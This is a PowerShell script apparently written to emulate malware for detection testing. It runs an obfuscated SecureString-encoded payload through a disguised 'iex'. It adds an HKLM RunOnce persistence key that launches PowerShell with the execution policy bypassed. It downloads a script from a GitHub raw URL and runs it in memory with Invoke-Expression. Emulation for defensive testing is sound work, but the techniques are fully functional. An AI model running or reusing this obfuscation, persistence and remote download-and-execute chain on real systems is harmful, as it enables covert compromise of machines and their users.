 ### Just gets some host info
Get-Host -Verbose | select name,Runspace


####Emulates site visit
$visit_fake_cnc_website = Invoke-WebRequest -Uri https://cheese.com


##### Downloads PS script and sets it to the reg key runonce (Encoded with Invoke-Obfuscation with the Secure String option)
 ( [rUNTImE.INteropsERVIceS.maRshal]::pTRToStRINGBstr([RunTIme.inteROPsERVIcEs.MArShAl]::seCURESTrIngtObsTr( $('76492d1116743f0423413b16050a5345MgB8AHAAdQBrAHUAdQBWAGoAUwBRAHYAVwBQAEIARABtADUAVABHAGEAcwBhAGcAPQA9AHwANgBkADQAYgA2AGMAOQA4ADQAYwAyAGUAYQBjAGEAMQAxADAAMwAyAGUAMAAzADAANwBkAGEAYQBmADEAMwAyADcAOQBkAGIAMgA4AGUAYwA3ADcANQBlAGYAMAA1AGYAMgBkAGYAMQA1AGYANgA3ADIANwAzADcAZgA5ADMAMgA1ADEANgAyADQANQA0ADYANgAzADMAOABmADQAZAAxAGUANgA1AGMAOAAzADYANAA2AGUANAAwADIAOQA1AGQAZQBiADkANQBmAGMAZQBmADkAZAAyADIANwBjAGIAYwBhAGIANgBlADEAYgA3AGQANwA0ADIANQBmADYAZQBmADUANAA4AGYANQBkAGYANgBjAGYANAA2AGEAYwA1ADAAZgA4AGUAZgA2ADMANAAyADUANQA5ADkAYgA3ADEAMwA2AGEAYgA5AGYAMgA2AGEAYQA5ADgAMQA2ADAANwBkADMANwA2ADAANAAxAGMAZQBmAGQAYwBhAGEAZQA4AGYANAA5AGYAYgBhAGMAYwBhADEAYQA3AGIAMwBmADcANgA0ADUANQBkADIAYwA5ADgAOQAzADQAMAA2ADQAOQAxADIANgAzADYANwBlADAANgAzADYANABlADIAYQAwADYANwAyADAAMQBhAGYANQAwADYAYwBiAGUAMwBkADYANAAyADEAZQAyADMANQAyADAAYgBhADMAZgA1AGIAZABkADYANQA1AGIANgA3ADMAMwA2ADIANABkAGEAMAA3ADAAYQA2AGUANgAwAGMANQA5AGMANgAxAGEAMgA1ADgAYgBhADIAZgAwADAAMwA0AGQANgAyADAANABkAGEANQAxADIANQBmADkAYwAwADAAZgBhADAAYgBmAGMANAAwADgAOQAyAGEANgA0ADQANwA1AGUANwA3ADUAMwA0ADkAMQBkADAAZQAyADMANABjADQAZQA0ADYAMwA0AGUAZABhADAAYwBmAGIAZQBkADUAMgBjAGUAZAAwAGQAZABlADEAZgBiAGMANQA0AGIAOAA4AGIAMQBiADYAMQBiADEANwBiADEAYgBkADQAMgA2ADYAZQBlAGQAMwA4ADIANwBiAGYANwAyAGMANAA5ADcAZABmADUAYQAwADcAYQBiADUAMgBhAGMANwBjAGMANgA2ADYAYgBmADAAOABkADMANwBmADAAYwAyAGYAZQA3ADAAMABmAGEANQAxADcAMwAxADkAOQA5ADEANwBhADEAOAAyADAAMAA4ADMAYwAxADUAZgBkADMAYgAwAGYANQBjADgAMgA1ADYAMQAwADQAOAAyAGIAYgBlADUANgA1ADcAZgA4ADUAYQA4ADgAZQA3ADMAYQA0ADkAMgBiADgAZgA4ADUAMAAwADkANABjADcAYwA5ADAAMwBlADgAYwAzADMAZQA1ADYAMgBhAGUANQA=' |ConveRTTo-SEcUREstrInG -kE  (154..131)) )) ) | . ( $enV:COmSpeC[4,26,25]-joiN'')

#The Name of the Registry Key in the Autorun-Key.
$KeyName = 'Run'

#Command to run
$Command = '%systemroot%\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -file C:\temp\helloWolf.ps1'

    
    if (-not ((Get-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce).$KeyName ))
    {
        New-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce' -Name $KeyName -Value $Command -PropertyType ExpandString
    }
    else
    {
        Set-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce' -Name $KeyName -Value $Command -PropertyType ExpandString
    }


#### Executes Powershell directly from GitHub
$RunFakeFilelessMalware = Invoke-WebRequest https://raw.githubusercontent.com/juli0mendez/testfiles/main/get_ad_logons.ps1
Invoke-Expression $($RunFakeFilelessMalware.Content) 
